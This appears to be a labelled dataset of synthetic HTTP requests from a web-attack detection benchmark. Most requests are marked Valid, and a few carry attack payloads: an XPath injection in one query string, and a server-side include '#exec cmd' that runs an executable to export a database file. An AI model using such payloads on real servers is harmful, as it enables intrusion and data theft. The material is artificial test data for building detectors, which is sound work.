GET /VGnph-u1E/ira@zNxfNQiynWIc9/Sx29F/Pz1pN/KUjCxorphpcrservicesIQ/I2JFA2ERzG/qo.dll?IO7Wx%u=86502275&a4reIsicnof7roo=6794210&ehnyqiearc1=ln+a0pahfoC&J2yCnQ3U=oiso+&D5s0A-T1pt=44048510&qrh=att%5CyiNmuf3r&te=1af&ataeq3lgsieaw8m=aZk7Z2IN&gJ5H=875116292&nt8lca9c=16 HTTP/1.1
Host: 130.155.78.98
Connection: he7etgc
Accept: text/*, text/html;q=0.2
Accept-Charset: cp-936, iso-8859-8;q=0.2, x-mac-cyrillic;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 20.119.218.18
Cookie: L3DaE3dwCA4I=bgwhKd@;ntPwenstot0fa=r-s7cenE0=dOd?whereTs
Cookie2: $Version="35"
Date: Sun, 25 Sep 05 22:08:17 UTC
ETag: "HAKS-GZxAfZFJzHFo@3"
Expect: 100-continue
From: ldbonaa@rtlruedpi.uk
If-Modified-Since: Wed, 05 Aug 09 24:55:16 GMT
If-Unmodified-Since: Wed, 23 Mar 05 22:54:36 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 850
MIME-Version: 2.3
Pragma: deslue='iee20'
Proxy-Authorization: Digest qop=Rnunev
Authorization: Digest nonce
Range: -569,-376,5-
Referer: /eeoeR/ysorOto/esch/tae98.png
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.0 (X11; U; Unix 4.4; 8m-ar; rv:1.2.4) Gecko/51883755
UA-CPU: x86
UA-Disp: 7874,6904,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8070x456
Via: HTTP/8.3 58.34.1.36:72, 5.4 www.heleh.htm, 3.1 67.72.12.121:3801
Transfer-Encoding: gzip
Upgrade: icst/6.9
Warning: 941 204.125.32.112 "Rsze" 
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 045641430
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28200
Start - Id: 25959
class: Valid
GET /Athbtci/2r/sschodawieDhZe/Noednmesrhej4D/AJ65fDXY/yNoTkyXQMHW.asmx?eem=wn9tstawmlseDux&k7TY9N8having=ise5k9nn&nesnoatisyiRts=6405&W@X6-d=250395&1O=04&d38cit6eo=q+En%7E+dropj&oholststd=uwiynlsogroup+byz0ekreplacepasswdmlink&BTF74=1&o9N4sf=50315939&2yd=ewS4&ieqsny=gk&lnsogi2iHa=108655491 HTTP/1.1
Host: www.o0dUeos4et.org:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-cyrillic, windows-1258, euc-cn
Accept-Encoding: *;q=0.4
Accept-Language: htNt-aoaahTa;q=0.1, 6ngfte-saghs;q=0.4, c-etbh
Cache-Control: max-age=45
Client-ip: 24.235.222.46
Cookie: aamoaf=508347;lsk1Qkjkvar=514;COpservicesL-IF=99;es2paez5ord=psznzaStmnTs5h6
Cookie2: $Version="2"
Date: Fri, 16 Apr 10 15:54:30 GMT
ETag: W/"wo3tumGbCtZlZ-PW4n"
Expect: aTaral
From: tztba@mlyibacoy2.cz
If-Modified-Since: Sat, 12 Mar 05 14:54:02 CET
If-Unmodified-Since: Thu, 06 Nov 08 11:56:37 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: dq3Bsa A2qrtl=9wki
Authorization: rtsr 0dSh=iih9
Range: 041-
Referer: /atu9i/wdrdwnS.cgi
TE: gzip;q=0.9,trailers
Trailer: Host
User-Agent: Mozilla/0.6 (Windows; U; Win98 4.6; sw-3a; rv:8.7.4) Gecko/88952123
UA-CPU: MIPS
UA-Disp: 3281,342,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5187x1770
Via: HTTP/5.7 96.189.130.72, 5.8 27.177.209.35
Transfer-Encoding: deflate
Upgrade: ci5/2.9, wetema/8.5, v8el3/8.4, izrs/8.5
Warning: 432 www.i3ei.js "ertmdUhs2iS" 
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 7358470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25959
Start - Id: 49975
class: XPathInjection
GET /dh/YQopt5QNF9fZ16klocationand/esIkT_2p42XiULSD0P/F6iswzfn/a8Yorhb/3i%u7SjTsTWhttps/rHslnudiatwmcw8ec.dll?lSmetal5gM=q7ea%28%3Enen&nnnon4=480295&wTaioz=h%3FadmineE&tmihse4B7e=ey0u&nrQoef=0690&bniot=5150975&asieDyu1csNihe=%24%28yiDorxaSy2j&rlu=o_oai6q&dnce7=axUvnDOZ&jhU0dfg=ji%27++or+++++ee%2Fo%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D593%5D+++or+%270HNensov%27++++%3D%27&hfge=5982302&ieeei=so%5CI&ia=iatuuiytl HTTP/1.0
Host: www.cdol.biz
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, deflate;q=0.3, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 213.241.64.40
Cookie2: $Version="83"
Date: Fri, 21 Mar 08 18:02:40 CET
ETag: W/"j_9d8nENb2Gi6G5"
Expect: etuerprO
From: aihryej@wvtazei.be
If-Modified-Since: Sun, 02 May 10 11:53:37 CET
If-Unmodified-Since: Sat, 22 Dec 07 15:54:06 CET
If-Match: "NCIoqX_liYB_xXW107AD"
If-None-Match: *
If-Range: Tue, 13 Mar 07 14:25:03 UTC
Max-Forwards: 8
MIME-Version: 0.0
Pragma: pshua9=b
Proxy-Authorization: Digest response="CC5E7EdEafE81B3DBCeA5a5BbFE19b80"
Authorization: Basic c2huZTp1bWl0OG8z
Referer: http://yeyA.ch/rnemhp/iinx/iDci5/hrriEote/znhqktRL.php
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/7.7 (Machintosh; U; Mac OS X 3.1; oi-to; rv:7.5.0) Gecko/56967750
UA-CPU: 68000
UA-OS: Linux
Via: 9xss/2.8 www.eteYr.png, evto/4.1 www.nqdee.jpg
Transfer-Encoding: gzip
Warning: 373 www.dycegetI.js "ud0n" "Sun, 04 May 08 18:18:10 CET"
X-Serial-Number: 6790519632
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49975
Start - Id: 17550
class: Valid
GET /0hi/eoo5rsNezscer/mJBG-nE9.tiff?Bwipucnma=md+echo+urokuI&toemaoWbcaf=13eLo%7E&q4clkmaels=e&EAlwS1EJB=snrt7raeo&tabp4aaoe1ndse=%3Cth&s5bE4=eSst%2Boa&Kbd8S=650334&tftnvtTrb=ltoeti&sXWCOM=665695&Ihpn=FmS&jDAy=kt+3ieziio+ya HTTP/1.0
Host: www.eeyas.st
Connection: Atet
Accept: image/jpeg
Accept-Charset: x-mac-chinesetrad, x-mac-arabic, windows-1258;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=406
Client-ip: 130.134.24.111
Cookie: haOtoes0sgetin=tET0PujZKeV;deahtppfLee=e4Fel;CC_lsJmCls17R=omailjtc;AY4PTaQhIq1.=wdai;y83UMnullkGQYs= ie8ietesc
Cookie2: $Version="90"
Date: Fri, 30 Oct 09 13:47:39 GMT
ETag: W/"2n4j4zLh1TacBCC6jf"
Expect: 100-continue
From: noim@o36slone.be
If-Modified-Since: Wed, 07 Nov 07 03:42:00 UTC
If-Unmodified-Since: Wed, 08 Jun 05 04:39:59 GMT
If-Match: "Pj7Wr5YekLnPrhu"
If-None-Match: *
If-Range: Thu, 04 Sep 08 06:59:51 CET
Max-Forwards: 9
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/hlsmf/elihchu/rrenbd.png
Authorization: usobak aruWyt=Eohf1me1
Range: -848823,71971-191917
Referer: http://www.oan4wet.org/hli84.shtml
TE: chunked
Trailer: Authorization
User-Agent: a3hlawa (cBv.H1; e4va33m)
UA-CPU: StrongARM
UA-Disp: 033,9220,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 845x6872
Via: HTTP/4.3 www.oC9n.jpg:7927
Transfer-Encoding: identity
Upgrade: qnef/6.1, teHndi/9.7, n5GAtw/8.0, Epe/2.3
Warning: 578 www.cuZgchp.tiff "esuto1wenhlasinfem" "Mon, 23 Mar 09 10:21:32 UTC"
X-Forwarded-For: 235.147.93.170
X-Serial-Number: 8998788877117234588
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17550
Start - Id: 15384
class: Valid
GET /tnda79tcymEkirR/dlhnwt/eB04H9n4s4rg-A8/eeree74teaoexg.jpg?u7tibghboeeihwa=z%3Ftmg&nicmzizsrI=Spassthru&twandatemm=652690&tidea6sem=shao&pgettl=l+essksek8ft&mj_dW=Orrcs38&aeNgOcaijnk5a=ijpassthrukcmd&esaSiTes=tSen&oaae8=sdae&hqlmthie1e=En%2Bea&luo3tyinhoyHr=977&oetwtls8nhRly1s=processing-instructionEl&C3NKQvzz=bininr HTTP/1.0
Host: www.ne2o0.st
Connection: tetid2
Accept: text/html, video/mpeg;q=0.8
Accept-Charset: *
Accept-Encoding: compress, compress, gzip
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 32.88.148.234
Cookie: CqtsnwRUl=7469331616;UTA.ji=0942;s.Gg4=lEdei;rctnsdls=15154
Cookie2: $Version="5"
Date: Sat, 11 Apr 09 15:21:21 UTC
ETag: W/"K32uOEH0nFv5TDh"
Expect: taS04eor=niqoa2A
From: geinl@l3cifnrd43.fr
If-Modified-Since: Mon, 27 Jul 09 02:45:36 CET
If-Unmodified-Since: Sun, 21 Jun 09 19:40:38 UTC
If-Match: *
If-None-Match: "oQBBtEvb6IwG6Rhk"
If-Range: *
Max-Forwards: 670
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: l7kr5 aism8h=ekiama5a
Authorization: Digest response="4fee8dA8B1AAdBaceba7687A41A1FaD6"
Range: 96924-,-3,41-800
Referer: /suTeoOo/titHp8/b1wgH7ib.wav
TE: gzip,deflate;q=0.4,trailers
Trailer: User-Agent
User-Agent: ky@qy3 http://www.hsn8wuis.org
UA-CPU: x86
UA-Disp: 4712,7583,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5103x7782
Via: HTTP/9.2 www.oevhc.tiff, elqcg/7.6 40.157.194.129
Transfer-Encoding: compress
Upgrade: tndn/7.8, ePi/5.6, fhesor/8.3
Warning: 850 186.24.247.67 "8prfa" "Tue, 18 Dec 07 05:47:03 UTC"
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15384
Start - Id: 1247
class: Valid
GET /e6duy8htsosYTicsi/oaitsbxsyou/t2q6Al7xKVQ/PqaLformI/tps/ndpsr.swf?Sp=8541082&ireetnGEe=0312&s66amOEoH=175557&0n5Hhr7obvree=r&fftci4iakhhfUd=7284351&APbha5O-bX0access_log=rwzeno%27ise+execnn&l5fOtUiTuTe=gh9J9OW0Ly&eif3erIS=4e8taehreplacefEtn&osigrk=position9u&silpRtgr=ehresg2hckvscr HTTP/1.0
Host: www.int3rkRr.cz
Connection: keep-alive
Accept: video/*
Accept-Charset: iso-8859-1, x-mac-cyrillic, iso-8859-2
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-stale=7295
Client-ip: 196.11.78.58
Cookie: eokiwacViaewE3l=Zucss;s444=lxY;3Lnu8=|hBrseuzai;tSonbMssihona=mhdg;ee8xugH7udet=n9rVQhaU;bantdhen=onrS
Cookie2: $Version="973"
Date: Fri, 21 Aug 09 01:10:50 CET
ETag: W/"peAJSBN4O_8DDBsCp"
Expect: rofae
From: rrss18n@ElE01poue.cz
If-Modified-Since: Tue, 04 Jul 06 10:26:30 CET
If-Unmodified-Since: Mon, 03 Mar 08 12:18:28 CET
If-Match: *
If-None-Match: "Ah3SlqO8M@n3LXjKFCYp"
If-Range: Thu, 08 May 08 18:32:48 UTC
Max-Forwards: 4418
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: nhcD swatey=b4qt
Range: -709
Referer: /jwttsam/ihao/ahcu/ItOjree/qhaAmr.zip
TE: gzip,gzip,trailers
Trailer: User-Agent
User-Agent: rrzsYcly (fuGrs5S)
UA-CPU: StrongARM
UA-Disp: 092,1496,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6040x9780
Via: HTTP/3.0 220.80.99.63
Transfer-Encoding: deflate
Upgrade: coiqe/9.7, 2su/5.0, e5rlaa/0.2
Warning: 857 146.112.213.43 "wajtoferos" "Tue, 12 Sep 06 24:09:14 CET"
X-Forwarded-For: 84.26.195.189
X-Serial-Number: 5267293747138696833
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1247
Start - Id: 23661
class: Valid
GET /72Ojuysb/no6eOrebheeedtromlr/1nph-w5_wp-jd7M3OCG.cgi?ltetIiloe=i&r4h7hOi=ers4nt&ajMr4ps=+exec HTTP/1.0
Host: 66.179.59.247
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-hebrew;q=0.7, x-mac-icelandic, macintosh;q=0.1, x-mac-turkish, iso-8859-8-i
Accept-Encoding: compress;q=0.8, deflate, compress
Accept-Language: fn-hL;q=0.9
Cache-Control: max-age=5
Client-ip: 35.46.231.160
Cookie: 6h0en3=e/eudOgi7a;tftpC3nFP=773220;o9JCvwwp-okjxa=samrnrrwtaoeamail;1o=lBet
Cookie2: $Version="2"
Date: Sun, 16 Sep 07 11:07:16 CET
ETag: W/"hJnbxoEublZENg7E"
Expect: 100-continue
From: sdRsrbm@8Ksyhxnv6C.uk
If-Modified-Since: Sat, 01 May 10 24:37:13 UTC
If-Unmodified-Since: Tue, 28 Jul 09 22:19:44 CET
If-Match: "J-8gVRMeWSfI.GtN9s"
If-None-Match: *
If-Range: *
Max-Forwards: 526
MIME-Version: 3.7
Pragma: Euero=Wiceya
Proxy-Authorization: Basic ZGFhaGJsOmh0MmRk
Authorization: NTLM YWgzZWZhZWhpYWloaHU4YWJlc3VydHNhQnNlYUE0ZG5obWFubHBvYW55aGJqcw==
Range: 00-,595-060
Referer: http://www.sd1e.ch/rsjm6nqf/kRsMr/qtojiUe/asoeodoO/irYd3.pl
TE: gzip;q=0.5
Trailer: Warning
User-Agent: iuF4DBd http://www.cd8lE.org
UA-CPU: 68000
UA-Disp: 488,135,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 961x2992
Via: HTTP/0.6 www.ut3eLdfe.css, 2.9 www.eptqTUw.gif
Transfer-Encoding: deflate
Upgrade: hnta/5.0
Warning: 106 www.otao9u.png "uedtUhed0asbe" "Sun, 20 May 07 15:25:06 CET"
X-Forwarded-For: 102.8.0.254
X-Serial-Number: 13224
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23661
Start - Id: 22364
class: Valid
GET /Vi30doF/1L0wL5.FkCeFbL.asmx?xMIcjnullG=4373275125&autoe=9 HTTP/1.0
Host: 127.158.160.221
Connection: keep-alive
Accept: video/*, audio/x-wav;q=0.1, image/*
Accept-Charset: cp-950;q=0.4, us-ascii;q=0.7
Accept-Encoding: 
Accept-Language: r6ae-uno;q=0.1, hihputod-eddjhs9;q=0.2
Cache-Control: only-if-cached
Client-ip: 91.192.17.39
Cookie: oa=08;molrtoonltdStex=A ;cnmpc=7hatW9sdnO;i6dseoostnmsa=bH25;yo2noaYe=t%idC;cwJJautoexecIV=execshttpchildy3a=ilidneI)
Cookie2: $Version="11"
Date: Tue, 18 Oct 05 14:52:37 GMT
ETag: W/"csl9NfrN.@ZWIclwVaKs"
Expect: 100-continue
From: ehfibls1@lhrs6.org
If-Modified-Since: Sat, 17 Nov 07 06:48:03 UTC
If-Unmodified-Since: Wed, 16 Jan 08 12:37:58 CET
If-Match: *
If-None-Match: "DAqJnqA.8kQFJuhAjx9"
If-Range: "3_fNb76fZnfPfSUXO"
Max-Forwards: 3996
MIME-Version: 8.8
Pragma: 0t='dsseiIt'
Proxy-Authorization: Digest uri=http://oaaa.com/neutur/gmqe/y1hen1/oiewude2/t2mmveSO.pdf
Authorization: NTLM TWRvTG51ZXloYWtpdnhyZWNzc3JkZXRpYWE3aGkyaW5pcjFh
Range: 541-893,-04,-1
Referer: http://www.iotq8ri.biz/egi5yl/qedYn/ltem/oe0Ong/rmlgn.sh
TE: deflate;q=0.6,trailers
Trailer: If-Unmodified-Since
User-Agent: nnH4dn52orxeTdemigei
UA-CPU: PowerPC
UA-Disp: 0605,1336,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 112x1566
Via: FTP/7.0 28.253.159.182, 1lErai/9.6 www.iE4u.jpg
Transfer-Encoding: gzip
Upgrade: aos/2.3, onrpu/3.4
Warning: 860 www.cneasowg.jpg:0858 "rgda4" 
X-Forwarded-For: 56.17.27.167
X-Serial-Number: 570685869927204
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22364
Start - Id: 40248
class: SSI
POST /dwddrzlh1Tnedte/tC0mopos9JUO/3JKdropEA.asp? HTTP/1.1
Content-Length: 334
Content-Language: i2yxh,luqiiu
Content-Encoding: compress
Content-Location: http://omy8etp.gov/1lfn/sasa/MthOhra/9mhyk/srl0smf6.txt
Content-MD5: bjhwNDJzdjFBZTlzYWhpdA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 28 Jul 05 23:02:28 UTC
Host: www.ts0oat.uk
Connection: dqllead
Accept: */*;q=0.2
Accept-Charset: iso-8859-3;q=0.0, euc-cn;q=0.6, iso-8859-2;q=0.3
Accept-Encoding: gzip, compress;q=0.3, gzip;q=0.3, deflate;q=0.5
Accept-Language: *;q=0.3
Cache-Control: no-cache
Date: Thu, 08 Jan 09 05:05:30 GMT
Expect: 4tksenn1=dexsrl4s;caevs=w60etc
From: YHtcdN@wRae.uk
If-Modified-Since: Tue, 24 Aug 04 02:25:28 UTC
If-Unmodified-Since: Sat, 18 Mar 06 06:58:49 UTC
If-Match: *
If-Range: *
Max-Forwards: 655
Pragma: no-cache
Proxy-Authorization: Basic b2VyeXI6S2l0OQ==
Authorization: NTLM MnJtUzd5ZUlpYnVrMGRjYW1hc1JvT2VlZXBvb25tdGlpZHJhdA==
Referer: /Qoio8sn.doc
TE: trailers,trailers,trailers
User-Agent: Mozilla/5.1 (Windows; U; Win98 0.3; 9h-wi; rv:5.6.0) Gecko/87137738
UA-Disp: 0036,0245,32
Via: 4.2 201.231.116.141:42932, sah7m/5.6 www.eTrar.jpg
Transfer-Encoding: compress
----: ------------------------

exsE=aiwVYi-f&HCeU5lS2=eCuxo&tVetouuthyie=2dtsitztuhpA1&hz=7pnrsme6n9bemtalfo&bd=nt&TN.IIuVpassthru=<!--  #exec cmd="c:\progra~1\3cnesqc\ecO4n\2mml6D7.exe  d:\AhW\www.nsvere.org\dlQ\database.mdb  /x exporttofoxpro"-->&il=525379&4fbNeln=Tte8boe&so8ilAeHob=i7i&lOLu4A@xxFU=98575&00hwn6eO=4b39j5ct r

End - Id: 40248
Start - Id: 18757
class: Valid
GET /lXqS3G4jz/p9s1dnmi6sE/GfromEprocessing-instructionupnph-YgPhttpssd/eihtasmei2genolnae/keBtM9l/b44YAMfJYUHo/yhaIsnTeh6tr.png?927doSAqy=a3j&passwdIZo3=ada HTTP/1.0
Host: 4.99.29.50
Connection: keep-alive
Accept: image/jpeg, application/postscript
Accept-Charset: koi8-r;q=0.5, x-mac-hebrew, isiri-3342;q=0.8, windows-1252;q=0.1
Accept-Encoding: 
Accept-Language: tsrea8Qm-ewe, hoaeinYc-dwseUo;q=0.3
Cache-Control: max-age=122
Client-ip: 119.221.206.231
Cookie: njrsafaoDs=n;1at=9jeoeobwgE'v;auahpRtuiH5Itt=5579;nrtykRw6etf7x=f3bneeen;trrSyyidtsfiu=9
Cookie2: $Version="6"
Date: Wed, 09 Jul 08 07:40:49 CET
ETag: W/"7gzlFUv03erW63B-VC4"
Expect: rtnpIya=nirrWdcs;hlOht=Hm0e
From: D5astys@snuabwthe.cz
If-Modified-Since: Wed, 23 Sep 09 07:56:32 UTC
If-Unmodified-Since: Wed, 21 Feb 07 13:25:19 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Apr 09 15:29:09 GMT
Max-Forwards: 0
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: esser hihGc=hbie3
Range: -062629
Referer: http://www.oerss.uk/0tln/hnmslaa/scqea/vroeG/eyih.js
TE: trailers,gzip;q=0.0
Trailer: Cache-Control
User-Agent: Mozilla/4.2 (Windows; U; Windows NT 9.9; oo-qt; rv:6.9.6) Gecko/43881174
UA-CPU: x86
UA-Disp: 752,4892,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 854x2880
Via: FTP/9.3 www.Eodrua.jpeg, 9.2 www.hettet.htm
Transfer-Encoding: identity
Upgrade: bUtii/8.0, waiu/0.5, s1teu/3.7
Warning: 895 www.ef4ioNd.js "fj9cdOInrh" 
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18757
Start - Id: 15371
class: Valid
GET /hedaoyli/gHOHdgybsjWLY@lb/tlRGS26-3Dlcn10.php3? HTTP/1.0
Host: 20.114.80.20:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-2;q=0.9, koi8-r;q=0.1, utf-8;q=0.4, isiri-3342;q=0.8, x-mac-japanese;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=682
Client-ip: 63.112.220.104
Cookie: OH7ZsLservicesYlvbscript=e2b
Cookie2: $Version="0"
Date: Fri, 05 Sep 08 21:59:05 GMT
ETag: "rL78fqyz9Z2kqgZoU2"
Expect: usuEsy=ohuAo3uo;niine
From: geinl@l3cifnrd43.fr
If-Modified-Since: Sat, 26 Jun 04 13:40:04 GMT
If-Unmodified-Since: Sat, 07 Jun 08 01:36:31 CET
If-Match: *
If-None-Match: "BWy7YiwDGb18BSm"
If-Range: *
Max-Forwards: 2081
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic bmVpc25hZGU6MHRzZ3Nv
Authorization: Digest uri=http://dNrt.cz/fc8nnpsn/odstmift/euFo/dtirk/yIEaoo.rar
Range: 41-,07174-
Referer: /ldthcn.asp
TE: chunked;q=0.3,trailers
Trailer: Accept-Encoding
User-Agent: nr9uk (ef8ogPY; erpl5YY7@8; e86F0UNb)
UA-CPU: x86
UA-Disp: 4712,7583,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5103x7782
Via: 9.8 www.kIwhn.jpg, FTP/8.0 www.eeies.shtml, 6.9 51.154.111.197:52266
Transfer-Encoding: Dxtil
Upgrade: Derl/0.8, eil/7.9, qewan/7.4, ntT2tl/6.4
Warning: 110 199.172.130.251 "3ahnwUsse4t" "Tue, 14 Jun 05 17:49:50 GMT"
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15371
Start - Id: 45181
class: PathTransversal
GET /./? HTTP/1.0
Host: www.wnigeug.ch:391
Connection: close
Accept: application/*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale=3315
Client-ip: 35.207.4.140
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Fri, 29 Oct 04 16:31:37 CET
ETag: W/"Q9YT7f22enb@zJ0p.VT3"
Expect: 100-continue
From: azaxo6@aowhloiie.net
If-Modified-Since: Mon, 08 Sep 08 23:17:43 CET
If-Unmodified-Since: Fri, 12 Mar 10 24:31:20 UTC
If-Match: ".fuOe1z2d2KYDMm4xL@d"
If-None-Match: *
If-Range: *
Max-Forwards: 747
MIME-Version: 0.7
Pragma: he='evhsp'
Proxy-Authorization: Digest uri=/teoadOp/uies/ebnnhteb/ariuiir/caepcrnU.pdf
Authorization: lu1l7 prUsP=IuiT
Range: 551-3881,-846
Referer: /glte/dbOistti/dt7ni/eEatse.cgi
TE: trailers,chunked,trailers
Trailer: Accept-Language
User-Agent: elix_a-fIC http://www.itlltqi.cz
UA-CPU: StrongARM
UA-Disp: 370,8487,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1177x8327
Via: 3.5 152.142.6.173, siqed6/4.1 169.175.109.189
Transfer-Encoding: identity
Upgrade: 2he9o/3.9, ews/1.2
Warning: 826 www.ta4rtlrX.css "e3eAsf" 
X-Forwarded-For: 254.171.174.88
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45181
Start - Id: 13620
class: Valid
GET /nIA.RgmG0/o1tite/Q.i5fA/tmpNfHCZsJ%u2xPBo_/is21@EMCED/tTc4Ka/ieec8tr9At33ra7Agul/gatQ5r76hvhKG-Dd8fhy/i4J859y_tI2yd/fWzmom/nftmAn.exe? HTTP/1.1
Host: www.oEatl.st:72
Connection: d6on
Accept: */*;q=0.7
Accept-Charset: euc-kr;q=0.8, ks_c_5601-1987;q=0.8, iso-8859-9
Accept-Encoding: gzip, identity;q=0.6
Accept-Language: dBtrb-tiaItlh, eciye-i
Cache-Control: no-store
Client-ip: 63.99.161.90
Cookie: cdurSalnt=nh;ttei1=ea&e
Cookie2: $Version="604"
Date: Wed, 10 Mar 10 05:26:23 GMT
ETag: "y_edEifPYWE54zi-v"
Expect: 5Eds=8ltlnft8
From: ednsif0g@o99ssn.be
If-Modified-Since: Fri, 29 Jan 10 01:09:41 CET
If-Unmodified-Since: Tue, 24 Apr 07 03:39:51 CET
If-Match: "j3mHltFsBBYDO0DU"
If-None-Match: "mNyFEfjiwdI.TCMB"
If-Range: "S-YRXpp@uYyHJH11F4"
Max-Forwards: 695
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: piudr oacenst=u98ae
Authorization: Digest qop=utuyieA
Range: 91-
Referer: http://iaeetstu.uk/SAeow0/du8e/oibs/adua9i/rerin.png
TE: trailers,trailers
Trailer: Warning
User-Agent: 7GObUK http://www.otbelvu.be
UA-CPU: PowerPC
UA-Disp: 0811,7383,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1926x6601
Via: iSg/0.3 207.240.140.149, 0.6 114.56.93.177, FTP/9.6 www.tyttdli.jpeg
Transfer-Encoding: identity
Upgrade: xAwDhi/6.3, egwu/9.7
Warning: 242 www.aseaogr.html "nerangaikenWialAe" 
X-Forwarded-For: 48.26.121.103
X-Serial-Number: 5747927259472661
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13620
Start - Id: 40430
class: SSI
PUT /tZI/eftndmn/admini6wZH-E@IGw/raGm3YUfTRcNbG5UKqZe/oMYzH8PZCPd/ofXGEV57w7DT.gif? HTTP/1.0
Content-Length: 264
Content-Language: uissoa
Content-Encoding: gzip
Content-Location: /itwo/nvN24ol/eeS9hhw/eob2.html
Content-MD5: bnluS3B5ZW50aXNoYWllaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 22 Apr 08 01:25:12 UTC
Last-Modified: Sat, 15 Sep 07 03:35:30 UTC
Host: 107.173.138.91
Connection: reheDT
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 210.34.220.164
Cookie: yhtmOarisda=ittsboof;e8t0tkalL=68435;6DOuuauxs=is eains/hcmdje qigo;ntrnewamspa=ep0Drd
Cookie2: $Version="1"
Date: Mon, 04 Aug 08 12:36:00 UTC
ETag: W/"qylo401A2MzfwYt4gbE"
Expect: ppvi4Cse
From: ssiur@ovoEteblT.it
If-Modified-Since: Mon, 19 Jan 09 03:46:01 CET
If-Unmodified-Since: Fri, 19 Jan 07 17:21:18 GMT
If-Match: "_7fyyKu2nFl-6A8VPB9"
If-None-Match: "Aizt1zFBiXUB@fh3r8r-"
If-Range: Fri, 20 Nov 09 08:19:54 UTC
Max-Forwards: 32
Pragma: no-cache
Proxy-Authorization: NTLM ZzZkZm13NWl0Y3BkZWJSc2UydGVFb3RkY3NxMmU1c2lsYmNyU3Vlc29lbg==
Authorization: NTLM bUZndGx0c2NlZXNhdEtlYzJ3YmVlaWltckdvdFNlcnNvc2FpakV0UmNpMm01ZW90
Range: 35-1,0691-
Referer: http://ahk7h.uk/1sad9uan/ereen2eT/arnhlnKr.swf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.7 (compatible; iasemc; Unix; xehakeLj)
UA-CPU: Sparc
UA-Disp: 6530,0907,16
UA-OS: WinNT
UA-Color: color16
Via: FTP/2.4 www.cigko72M.css
Transfer-Encoding: compress
Upgrade: ssho/3.1, nrn/6.3, eejp1c/6.4, yds/5.4, diMtw/4.2
X-Forwarded-For: 55.189.138.51
X-Serial-Number: 5862254515
----: --------------------
